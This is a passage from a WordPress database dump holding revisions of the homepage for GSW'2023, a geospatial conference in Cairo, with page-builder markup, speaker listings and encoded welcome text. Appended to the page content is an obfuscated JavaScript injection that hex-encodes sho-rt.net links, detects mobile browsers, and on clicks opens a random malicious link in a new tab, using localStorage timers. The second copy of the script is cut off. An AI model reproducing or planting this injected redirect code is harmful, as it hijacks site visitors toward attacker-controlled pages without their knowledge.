lMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 13:21:26','2022-10-07 13:21:26','',2167,'https://gsw2023.com/?p=2394',0,'revision','',0),
(2396,1,'2022-10-07 13:23:20','2022-10-07 13:23:20','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 \" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 